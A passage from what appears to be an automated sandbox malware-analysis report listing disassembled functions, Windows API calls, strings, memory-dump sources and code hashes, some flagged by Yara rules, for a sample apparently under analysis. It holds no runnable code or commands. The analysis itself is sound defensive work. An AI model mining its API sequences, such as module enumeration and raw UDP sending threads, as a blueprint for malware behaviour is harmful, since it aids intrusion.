                                      • Part of subcall function 004C31E1: CreateSolidBrush.GDI32(?), ref: 004C3203
                                    • GetObjectA.GDI32(?,00000018,?), ref: 00424C05
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Create__ftol$BrushClientColorFillH_prologObjectSolid
                                    • String ID: pTL
                                    • API String ID: 522557250-168633513
                                    • Opcode ID: f1069559148a93060107b759154f761520e5e06146e714d3b7cee3f679a40e2c
                                    • Instruction ID: cdfa35689f24075be06475114f615b7ba44637e7e2504af081bf02d55d0d71ef
                                    • Opcode Fuzzy Hash: f1069559148a93060107b759154f761520e5e06146e714d3b7cee3f679a40e2c
                                    • Instruction Fuzzy Hash: 7DC19D712083419FC354DF65D885F6BB7E8ABD4708F44491EF186C3291EBB8E908CB6A
                                    Function 00434520 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 181windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • IsRectEmpty.USER32(?), ref: 0043456D
                                    • GetSysColor.USER32(0000000F), ref: 0043457E
                                      • Part of subcall function 004C31E1: __EH_prolog.LIBCMT ref: 004C31E6
                                      • Part of subcall function 004C31E1: CreateSolidBrush.GDI32(?), ref: 004C3203
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,00000000), ref: 004C279A
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,?), ref: 004C27B0
                                    • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 004345C8
                                    • GetClientRect.USER32(?,?), ref: 004345E1
                                    • LoadBitmapA.USER32(?,?), ref: 00434618
                                    • GetObjectA.GDI32(?,00000018,?), ref: 00434667
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Object$H_prologRectSelect$BeginBitmapBrushClientClipColorCreateEmptyLoadPaintSolid
                                    • String ID: pTL
                                    • API String ID: 4061870766-168633513
                                    • Opcode ID: d22ffcdc13dcaf1a467ddecce6941c73bc44ea62a6a44f10aaf00481aa76cc3c
                                    • Instruction ID: 1810d52f328164b7834b3c8153f03923395e9a7b7f6e2ce0be090faeb37407d3
                                    • Opcode Fuzzy Hash: d22ffcdc13dcaf1a467ddecce6941c73bc44ea62a6a44f10aaf00481aa76cc3c
                                    • Instruction Fuzzy Hash: B36149765083819FD354DB65C945FABBBE8FBC9704F048A2DF19983280DB78A904CB66
                                    Function 004C4C11 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 140windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageA.USER32(?,0000019F,00000000,00000000), ref: 004C4C35
                                    • GetParent.USER32(?), ref: 004C4C3C
                                      • Part of subcall function 004C0722: GetWindowLongA.USER32(?,000000F0), ref: 004C072E
                                    • SendMessageA.USER32(?,00000187,00000000,00000000), ref: 004C4C8F
                                    • SendMessageA.USER32(?,00000111,?,?), ref: 004C4CE0
                                    • SendMessageA.USER32(?,00000185,00000000,00000000), ref: 004C4D6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongParentWindow
                                    • String ID: $]+B
                                    • API String ID: 779260966-2725609542
                                    • Opcode ID: 22e007e18bb943cde32e8129e9c2c4aeb771ce47ad7be2881f0389a9d8177362
                                    • Instruction ID: 9b5616c318e72614e4003df6d61864881c307661c9acb2d4e8240fcd43d4804c
                                    • Opcode Fuzzy Hash: 22e007e18bb943cde32e8129e9c2c4aeb771ce47ad7be2881f0389a9d8177362
                                    • Instruction Fuzzy Hash: 3F31E4782107186FCAA47A368DA0F3FB59DEBC4788B11492FF543C2291DA2DDC024679
                                    Function 00437980 Relevance: 12.4, APIs: 8, Instructions: 368windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreatePopupMenu.USER32 ref: 00437AFE
                                    • AppendMenuA.USER32(?,?,00004E34,?), ref: 00437C61
                                    • AppendMenuA.USER32(?,00000000,00004E34,?), ref: 00437C99
                                    • ModifyMenuA.USER32(?,00004E34,00000000,00004E34,00004E34), ref: 00437CB7
                                    • AppendMenuA.USER32(?,?,00000000,?), ref: 00437D15
                                    • ModifyMenuA.USER32(?,?,?,?,?), ref: 00437D3A
                                    • AppendMenuA.USER32(?,?,?,?), ref: 00437D82
                                    • ModifyMenuA.USER32(?,?,?,?,?), ref: 00437DA7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Menu$Append$Modify$CreatePopup
                                    • String ID:
                                    • API String ID: 3846898120-0
                                    • Opcode ID: b6c324ebf6d82f4da4ae19e17894f17d27b918a506a1d707fee6b1c05678ad7e
                                    • Instruction ID: 2562361174f688096016e80903cba8223acef38019fd2c3e83390ad70d6ce062
                                    • Opcode Fuzzy Hash: b6c324ebf6d82f4da4ae19e17894f17d27b918a506a1d707fee6b1c05678ad7e
                                    • Instruction Fuzzy Hash: 3DD17BB1A083109BC724DF19D880B6BB7E4FF89714F14492EF98597351E739AD04CB9A
                                    Function 004AF78A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 004AF7F7
                                    • GetStdHandle.KERNEL32(000000F4,005ADA04,00000000,?,00000000,?), ref: 004AF8CD
                                    • WriteFile.KERNEL32(00000000), ref: 004AF8D4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: File$HandleModuleNameWrite
                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                    • API String ID: 3784150691-4022980321
                                    • Opcode ID: 1c902af9e13bfc15a5b4eed6ccc3d91ff65314bd7102934c740c0b2c12b9a2ab
                                    • Instruction ID: 47903e3b742fe88d6eb4045abf554d7792539e90d53d8802c4ad06ac2a74b77a
                                    • Opcode Fuzzy Hash: 1c902af9e13bfc15a5b4eed6ccc3d91ff65314bd7102934c740c0b2c12b9a2ab
                                    • Instruction Fuzzy Hash: 3931D672A002086FEF20FAA5CD45FEE77ADEB56304F50006FF545E6181D6B8E9498B25
                                    Function 0043EA40 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: accept
                                    • String ID: %s:%d$P
                                    • API String ID: 3005279540-612342447
                                    • Opcode ID: 21d9c9f3a7aaa021ea2ffc47ef136dd4acebea34277fd51d2b85a00cbf923f7c
                                    • Instruction ID: 62b55f1a3e4caedb94a197477bd8de60541f53f619b3f0787c2ac5dbccf8f3cd
                                    • Opcode Fuzzy Hash: 21d9c9f3a7aaa021ea2ffc47ef136dd4acebea34277fd51d2b85a00cbf923f7c
                                    • Instruction Fuzzy Hash: 2D317331604A019FD314EB69DC99DBFB3E8FBD4324F004A2DF5A5922D0EB74A90A8B55
                                    Function 00420B10 Relevance: 12.3, APIs: 8, Instructions: 323COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e090d64062c982b48b40c42944b918bbfa007306d65a0a477db5de4cebe3a76e
                                    • Instruction ID: b5efdc66356610e75de02cdc537d97b48d1299cbfed8d312d3cda4a39d100d43
                                    • Opcode Fuzzy Hash: e090d64062c982b48b40c42944b918bbfa007306d65a0a477db5de4cebe3a76e
                                    • Instruction Fuzzy Hash: BCC1CCB0704750CFD338CF69D885A6BB7E4EF85318F504A2EE59687791CB38A805CB26
                                    Function 02425020 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 0242506C
                                    • Module32First.KERNEL32(?,00000224), ref: 0242508F
                                    • CharUpperA.USER32(?,00000008,?,?), ref: 024250A8
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 0242431E
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 02424330
                                    • Module32Next.KERNEL32(?,00000224), ref: 024250F8
                                    • CloseHandle.KERNEL32(?,00000008,?,?), ref: 02425108
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Module32tolower$CharCloseCreateFirstHandleNextSnapshotToolhelp32Upper
                                    • String ID: DWEBIO$DWEBLLIO
                                    • API String ID: 86103281-3981995823
                                    • Opcode ID: de2fdcbc77f2fb0dcf612acaecc84ad4bd1b90bcc46b2570e734b556569cab94
                                    • Instruction ID: 6469c723c172ba351acf29e39f111123634fe6e45b9721b6c3d48583bcec6bcd
                                    • Opcode Fuzzy Hash: de2fdcbc77f2fb0dcf612acaecc84ad4bd1b90bcc46b2570e734b556569cab94
                                    • Instruction Fuzzy Hash: 35216971900229ABDB25DBA6DD58BDAB7B9AF4C300F9045DAD508A2240DB75DA88CF90
                                    Function 02423536 Relevance: 12.2, APIs: 8, Instructions: 250networkthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InterlockedExchange.KERNEL32(02498658,00000000), ref: 024235FE
                                    • htons.WS2_32(?), ref: 024236E4
                                      • Part of subcall function 02422FA0: socket.WS2_32(00000002,00000002,00000011), ref: 02423008
                                      • Part of subcall function 02422FA0: sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02423072
                                      • Part of subcall function 02422FA0: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 0242314A
                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02423773
                                    • htons.WS2_32(?), ref: 02423793
                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02423803
                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 024238AF
                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 024238FB
                                      • Part of subcall function 02422399: RtlEnterCriticalSection.NTDLL(02434050), ref: 02422410
                                      • Part of subcall function 02422399: RtlLeaveCriticalSection.NTDLL(02434050), ref: 02422724
                                    • RtlExitUserThread.NTDLL(00000000), ref: 02423903
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: sendto$CriticalSectionhtons$EnterExchangeExitInterlockedLeaveThreadUserselectsocket
                                    • String ID:
                                    • API String ID: 3382933480-0
                                    • Opcode ID: b6cd93232c76744c4d422555610a4e78ffb816d94a8b883e1b33f06532cea989
                                    • Instruction ID: 67fb0a8070e955dd6c1b8fa64d69fec72176694ebabab0ff781dec6424861190
                                    • Opcode Fuzzy Hash: b6cd93232c76744c4d422555610a4e78ffb816d94a8b883e1b33f06532cea989
                                    • Instruction Fuzzy Hash: 53A19271D082A89ADF20CB64CC91BEAB775AF44700F5045DAF6CDAA280D7F55AC8CF51
                                    Function 00424360 Relevance: 12.2, APIs: 8, Instructions: 198COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • GetClientRect.USER32(?,?), ref: 004243AE
                                    • IntersectRect.USER32(?,?,?), ref: 004243C6
                                    • IsRectEmpty.USER32(?), ref: 004243F6
                                    • GetObjectA.GDI32(?,00000018,?), ref: 0042442D
                                    • IntersectRect.USER32(?,?,?), ref: 004244A8
                                    • IsRectEmpty.USER32(?), ref: 004244B3
                                    • DPtoLP.GDI32(?,?,00000002), ref: 00424576
                                    • IsWindow.USER32(?), ref: 004245D8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$EmptyIntersect$BeginClientClipH_prologObjectPaintWindow
                                    • String ID:
                                    • API String ID: 611846025-0
                                    • Opcode ID: dc8e01ebcd05ee70272f4933fd7ef20f4af080a48b019e5b921ec7157ea96930
                                    • Instruction ID: 9d3f052779077e2402b54e519e9242df3a4936652b9d6714be31234adec7d555
                                    • Opcode Fuzzy Hash: dc8e01ebcd05ee70272f4933fd7ef20f4af080a48b019e5b921ec7157ea96930
                                    • Instruction Fuzzy Hash: 6F814BB55083459FC364DF25D984E6BB7E8FBC8704F008A2EF59A83240D774E909CB66
                                    Function 0242DA22 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 95stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 024213E8: InterlockedExchange.KERNEL32(024340B8,?), ref: 02421406
